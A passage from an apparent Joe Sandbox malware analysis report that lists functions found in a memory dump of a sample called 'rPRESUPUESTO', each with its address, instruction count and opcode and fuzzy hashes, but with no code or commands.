                                                • Instruction Fuzzy Hash: E741B1726087469FD320DF6CC840A6AB7E9FFC8700F144A29F995D7690E730EA14C7A6
                                                Function 017D4859 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 168cdc483016c80a790195a16b145b81e9018e58be7ddb3e13b29ad2d2bcb6ae
                                                • Instruction ID: 891b9b5879f2eb4c77fd799de0dc6e85b6aafab5bf1f4009c7b1f8ded1d91da2
                                                • Opcode Fuzzy Hash: 168cdc483016c80a790195a16b145b81e9018e58be7ddb3e13b29ad2d2bcb6ae
                                                • Instruction Fuzzy Hash: 0241C03060030A8FD725DF29D888B2AFBF9EF80354F14446DE6968B6A5DB70D951CB91
                                                Function 017C8B50 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c5cee59e8f686dbd6452c6ac423d1889f3a067ca19eb3415fa3fc21fc55a000
                                                • Instruction ID: a1db07ec1e075925b1b5b7492cc9e9b3fa044fb2f72b9d0b8c057d2d673a1b3b
                                                • Opcode Fuzzy Hash: 4c5cee59e8f686dbd6452c6ac423d1889f3a067ca19eb3415fa3fc21fc55a000
                                                • Instruction Fuzzy Hash: 614180B1A01619DFCB25CF69C98099DFBF1FF88B20B1486AED466A7350DB34A941CB41
                                                Function 017E02E1 Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction ID: a06f0333d7c988500416755d6fd45c50931028a67f0e514cabbb98d027b52309
                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                • Instruction Fuzzy Hash: 76311831A04244AFDB229B68CC48B9BFFE9EF58350F0841A9F455DB356C6B49944CBA0
                                                Function 0187E3DB Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df43f7af7165fc88d7193d08b1307d9de8aab43f0c354b2c81fc1e46be95f156
                                                • Instruction ID: 8494422cdfc78f79ecf957ba63ffdd56dfebd0d6f216f222524e0d830d905c5b
                                                • Opcode Fuzzy Hash: df43f7af7165fc88d7193d08b1307d9de8aab43f0c354b2c81fc1e46be95f156
                                                • Instruction Fuzzy Hash: 9831B93574070AABD7229F698C85F6B76E8AF58B54F000068F600EB3D5DAA4DD00C7A1
                                                Function 01884B4B Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf7ee2f3b045522e9be59792375c6aad9554e14036e2c6f4129f807ef7984d38
                                                • Instruction ID: 86c64ba7348ad3a6b0bffa44d8fdcd59aa7e2456ce9d91986d309e840ccc02dd
                                                • Opcode Fuzzy Hash: bf7ee2f3b045522e9be59792375c6aad9554e14036e2c6f4129f807ef7984d38
                                                • Instruction Fuzzy Hash: BB319C322052028FC331EF19D984B26B7EAFF84360F1A446EE995CB755E731AA00CF91
                                                Function 017D4260 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94a25e3a1f35f986992365916f2e1ebdeef1efeda6561ed51801ae3b7058e0e8
                                                • Instruction ID: 976f87636102cef1e7aca46d3be8da44fab11dff1b10d92922ca7dd0cdc638bc
                                                • Opcode Fuzzy Hash: 94a25e3a1f35f986992365916f2e1ebdeef1efeda6561ed51801ae3b7058e0e8
                                                • Instruction Fuzzy Hash: D541AD71200B49DFD722CF28C885BA6BBE9BF89714F154429F69ACB651DB70E900CB90
                                                Function 01884BB0 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a864c6f8fa6c31f46ee72e00180f68383d821bed5aba480d06a6d7647c78ea
                                                • Instruction ID: 6111583876bb36205362105704b7f45a03c3fd370c1b2d4a0f4f1f017b05aa0f
                                                • Opcode Fuzzy Hash: a1a864c6f8fa6c31f46ee72e00180f68383d821bed5aba480d06a6d7647c78ea
                                                • Instruction Fuzzy Hash: 1C317E726043028FD320EF28C880B2AB7EAFB84710F19456DEA55DB755E730EE04CB91
                                                Function 0184EB1D Relevance: .1, Instructions: 100COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc46084386b5fc5a544eeb2930a7569e956f24813ddb4c9a1a745f9c63be13a3
                                                • Instruction ID: 900454a7df90818cf412ac0a7a7f541e3d2308606188d7fe9e3739b6d95e8b80
                                                • Opcode Fuzzy Hash: fc46084386b5fc5a544eeb2930a7569e956f24813ddb4c9a1a745f9c63be13a3
                                                • Instruction Fuzzy Hash: 5831B43160168E9BF322976CCD48F15BBD8BB44748F1D04A0AE45EB6D2DF2CDA80C225
                                                Function 018961C3 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae366bab9dc086d7d26918a0bfe1e46b9a2af73adacf5ff3a41e0f2d2985578c
                                                • Instruction ID: 0a748489578459997a992cc46169b2cef9de6705997ffccbfb6ff45224945d58
                                                • Opcode Fuzzy Hash: ae366bab9dc086d7d26918a0bfe1e46b9a2af73adacf5ff3a41e0f2d2985578c
                                                • Instruction Fuzzy Hash: 2831E476A0011AEBDB15DFD8CC44BAEB7B9FB48740F5941A9E900EB244E770EE00CB90
                                                Function 0187483A Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a4a01d28314d3b6b8d8da14757b791afccd9019449b2473e64d1cd7a96b4968
                                                • Instruction ID: 3b751a85a5e43c1cb340db691a61765a37d73e2f6425cc4831558dbb9ffdbcf3
                                                • Opcode Fuzzy Hash: 6a4a01d28314d3b6b8d8da14757b791afccd9019449b2473e64d1cd7a96b4968
                                                • Instruction Fuzzy Hash: 31313576A4012DABCB21DF58DD48BDEBBF9AB98350F1500A5E508E7260DA30DF918F91
                                                Function 017FEB20 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ef8863c0ef8c52ba25fe9b592257c8fc565586218889f590fa7595d3c1acb75
                                                • Instruction ID: 1b6ca5db284dd27e0c3bafeaf171ce4d6c4b4b19e1b220fba441759f280aa182
                                                • Opcode Fuzzy Hash: 2ef8863c0ef8c52ba25fe9b592257c8fc565586218889f590fa7595d3c1acb75
                                                • Instruction Fuzzy Hash: 7231B632D00219AFDB21DEA9CC44EAFF7F9EF44750F014469E616D7260D6709E008BE1
                                                Function 018960B8 Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 64cf35cc2556a2c7a1a88e0c48ea21e2f175c728627688114259bfdad48be1d0
                                                • Instruction ID: 0d8a90828b9daf603fc38a2b91b905f5f2c719cebf3acf9550643bb85071070f
                                                • Opcode Fuzzy Hash: 64cf35cc2556a2c7a1a88e0c48ea21e2f175c728627688114259bfdad48be1d0
                                                • Instruction Fuzzy Hash: 6B31CA71B40A06EFDF129F69C850B6EB7F9AF44754F24406DE505DB352EA70DE018B90
                                                Function 017D07AF Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 756047849040e9b2fbd53f563cc595ce00bd0aeba5f232d35d4856205ad82ece
                                                • Instruction ID: 8345b9585cdd3e9daa8a5b5143402354030ecf7b795346a87ff6c83d5c53a231
                                                • Opcode Fuzzy Hash: 756047849040e9b2fbd53f563cc595ce00bd0aeba5f232d35d4856205ad82ece
                                                • Instruction Fuzzy Hash: 0A31F172A4471ADFC722DE688888A6BFBB5AFD4660F01452CFD59A7310DA30DC0187E1
                                                Function 017D8550 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a473adfa17d7d711339ddbdb3aecda02d96b87a76ff8f08d0d420150d9ed992
                                                • Instruction ID: 5460b38b000267bb3429facc5389004cefd3fbe7c55c6d11b6f2c8615d79d680
                                                • Opcode Fuzzy Hash: 4a473adfa17d7d711339ddbdb3aecda02d96b87a76ff8f08d0d420150d9ed992
                                                • Instruction Fuzzy Hash: 53319A716093018FE720CF19C940B2AFBE6FB88B00F58496DEA85DB351D770E948CB92
                                                Function 0180A6C7 Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction ID: 06ef6703d1924d17c233f928ce64e6b30679938b965f3eda21dfa8a2565bf605
                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                • Instruction Fuzzy Hash: F5312CB2B00705AFE765CF6DCD41B57BBF8AB09B50F14452DA59AC3690E630EA008B60
                                                Function 0187EBD0 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de39398c13049d4af0228de7a0eaccc4ce6453cf99ab277d7c22c20cefc52048
                                                • Instruction ID: ad6df9ee95232f620451f6946164f8371f2e433ec2ec1497bf45ff60d64ea5d2
                                                • Opcode Fuzzy Hash: de39398c13049d4af0228de7a0eaccc4ce6453cf99ab277d7c22c20cefc52048
                                                • Instruction Fuzzy Hash: BC31A7B55053018FC721DF19C58485ABBF9FB89714F0489AEE4889B316E331DA45CB82
                                                Function 017F438F Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 172cfb8471b6799d88d10c04153deb25cc9fd3f07eb2db1e99fd6db65bda69fd
                                                • Instruction ID: a2be8ad66bf3258c7f0cc6cd447fe8170a480faf89a2f0c68ccc17ac336bad7d
                                                • Opcode Fuzzy Hash: 172cfb8471b6799d88d10c04153deb25cc9fd3f07eb2db1e99fd6db65bda69fd
                                                • Instruction Fuzzy Hash: 6331AF72A002059FD720EFA8C984A6BFBF9AB84304F148529D646E7755E730DA45DB90
                                                Function 017CCB7E Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                • Instruction ID: 7c0b0d99d5ae0bd66933dd93485d0edbd22f68fb5353ef55a5d7f2c3a3937944
                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                • Instruction Fuzzy Hash: A5210936E4025AAAD712DFB9C844BAFFBB5AF14740F058479DE55E7340E270CA408790
                                                Function 017CC156 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec443daefd51438d9c89c2f42cb7d9c0d50ca3c4deb4892cafe886aa3ce072b3
                                                • Instruction ID: 0d40c36229aaeea47d1b8f83060a6f1478217bfaf229c686f112d665b03c0e25
                                                • Opcode Fuzzy Hash: ec443daefd51438d9c89c2f42cb7d9c0d50ca3c4deb4892cafe886aa3ce072b3
                                                • Instruction Fuzzy Hash: 57312C725002118FD732AF68CC44B79BBB4AF54314F5482A9DD45DB346EA74DAC6CB90
                                                Function 0188C3CD Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                • Instruction ID: d9468c06c676bf662c22468d459d9300759474d050c9c640f6b99af0206f4f46
                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                • Instruction Fuzzy Hash: D8214B36600652A6CB25BBDD8C40AFABFB5EF40710F00801AFAA5C7695E734DB80C3B1
                                                Function 017CE420 Relevance: .1, Instructions: 88COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d35fc3a01e74d3c914d883eac0637bf279795bea94cc79a686168858efb42f1d
                                                • Instruction ID: 7eba61fcd820916607af931052228e921781a8cbf29965625f2069c2005b0fb0
                                                • Opcode Fuzzy Hash: d35fc3a01e74d3c914d883eac0637bf279795bea94cc79a686168858efb42f1d
                                                • Instruction Fuzzy Hash: 8F31D432A0152C9BDB31DB18DC41FEEFBB9AB15B40F0100E9F645A7290DA749F808F90
                                                Function 01804588 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction ID: 9fedcdcb6a37e67c6f5e35164e6a4ce0cc59636d2847bdda1682d16fe09d4e9a
                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                • Instruction Fuzzy Hash: FD219631A40609EBDB51CF98CD80A8EBBF5FF48314F108165EE25DF281E671DB058B50
                                                Function 018044B0 Relevance: .1, Instructions: 87COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dba93dc3897d9bbc80497d66ad017a2cd8384d3e1bfe7a04aeaf5f82d2e88b2
                                                • Instruction ID: 85b715ec7b5a6a93313d474525af6041c6892eb88d3c5ee8bd9dfe29a2478026
                                                • Opcode Fuzzy Hash: 3dba93dc3897d9bbc80497d66ad017a2cd8384d3e1bfe7a04aeaf5f82d2e88b2
                                                • Instruction Fuzzy Hash: 0D21B1726447499BC722DF18D840B6BB7E4FF88760F014619FE589B685D731EA00CBA2
                                                Function 017CE388 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction ID: 2dfc5e871b5affec0a2f887f41aa01b800cc91eb8a2d819cb34044294af91709
                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                • Instruction Fuzzy Hash: 39316931600645EFD721DBA8C884F6ABBF9EF85754F1045A9E952CB290EB30EE42CB51
                                                Function 0184E609 Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f88caf7447fd7ff9dc42e4699543708cc3815a1f4ac9f82879f85046df17894
                                                • Instruction ID: 616fdd3f9856910eb329d6c6e307c4afab0c464dd5332f97aad816a00b6c9a46
                                                • Opcode Fuzzy Hash: 2f88caf7447fd7ff9dc42e4699543708cc3815a1f4ac9f82879f85046df17894
                                                • Instruction Fuzzy Hash: FC313A75A00209DFCB14CF1CC8849AEB7B6FF88314F25446AE809DB395EB75EA50CB95
                                                Function 018506F1 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eb4134a49fc824c6159ec2cebea2654e394ad9bc690539c52212e49655d38680
                                                • Instruction ID: cf2438377eda1b31e1152360c77f91affdbf062d9bdfe43d74683fe247f64026
                                                • Opcode Fuzzy Hash: eb4134a49fc824c6159ec2cebea2654e394ad9bc690539c52212e49655d38680
                                                • Instruction Fuzzy Hash: 19219F71A006299BCF20DF59C881ABEB7F8FF48744B504069F941EB254E739AE41CFA1
                                                Function 0185019F Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 852c16f8eecc068c396c11d9c06dabbeb5d66d66375620426788917dddced9b8
                                                • Instruction ID: 9d918f11b37db682d286dc1f75ea0aa70774806f7a75334e0659cb3091ccb912
                                                • Opcode Fuzzy Hash: 852c16f8eecc068c396c11d9c06dabbeb5d66d66375620426788917dddced9b8
                                                • Instruction Fuzzy Hash: 61219A72600649AFD716DB6CC844F6AB7E8FF58780F1400A9F944DB6A1D634EE40CBA8
                                                Function 01850283 Relevance: .1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c691af68bedbae7cf9730766d0ff1547c8c8c03176870f7653a31dbc28bdbc31
                                                • Instruction ID: 8bb4f02ca65eab606494587fc27b4e708d8596e7742f2f94e9e73c5e7915a6a4
                                                • Opcode Fuzzy Hash: c691af68bedbae7cf9730766d0ff1547c8c8c03176870f7653a31dbc28bdbc31
                                                • Instruction Fuzzy Hash: 2D21B3725043469BD721DF69D948F9BFBECEF94344F080456BD80C7262D734DA44C6A2
                                                Function 017F2835 Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 834ff62e7be54510d49d2d873947ba6ce0cc424b40048eb807a4bea4c7c02bcf
                                                • Instruction ID: 373b8d2c76aad4df4e95b6ecf7a225aa277df7a1ff992b040f10115367d097b3
                                                • Opcode Fuzzy Hash: 834ff62e7be54510d49d2d873947ba6ce0cc424b40048eb807a4bea4c7c02bcf
                                                • Instruction Fuzzy Hash: 2121D7316456859BE326A76CCD0CB25BBD4AB45B74F1803A8FA60DB7E2DB68C9418241
                                                Function 0180A30B Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4421fdd38ee6a3dca8a27cc9883e8cbfee54763071a42cb742837ecf97982bd2
                                                • Instruction ID: 9c24586c7ecff922126ef1e00df2b566c3ae9c9c97e4a1c41c19c6adc4299899
                                                • Opcode Fuzzy Hash: 4421fdd38ee6a3dca8a27cc9883e8cbfee54763071a42cb742837ecf97982bd2
                                                • Instruction Fuzzy Hash: B821A979210B059FC729DF29CC00B56B7F5FF08B08F248468A509CBBA1E731EA42CB94
                                                Function 0188A49A Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3ad849bf929bce839387b65842cf710540911d5e11915705c091c0b02194360
                                                • Instruction ID: 5a251ee21ff88abd2690968b1b5d369d2bd50d109104ca88b710bbc2aca8fab2
                                                • Opcode Fuzzy Hash: a3ad849bf929bce839387b65842cf710540911d5e11915705c091c0b02194360
                                                • Instruction Fuzzy Hash: E9115C76340B167FD72666999C44F27B6D9DBD5B30F210029B708CB2C0EB70DD0087A6
                                                Function 01850946 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b711fff877be58a77b8fc5466b0d7f75149e44fbe04563e59d623378dde2fead
                                                • Instruction ID: 612260c1d7b310906ecb4c043e4fe2474bace7497eeed8cafff252555274f75b
                                                • Opcode Fuzzy Hash: b711fff877be58a77b8fc5466b0d7f75149e44fbe04563e59d623378dde2fead
                                                • Instruction Fuzzy Hash: E221C5B1E00249ABCB20DFAAD9859AEFBF8FF98700B10012EE905E7354D7749A41CB50
                                                Function 018680A8 Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
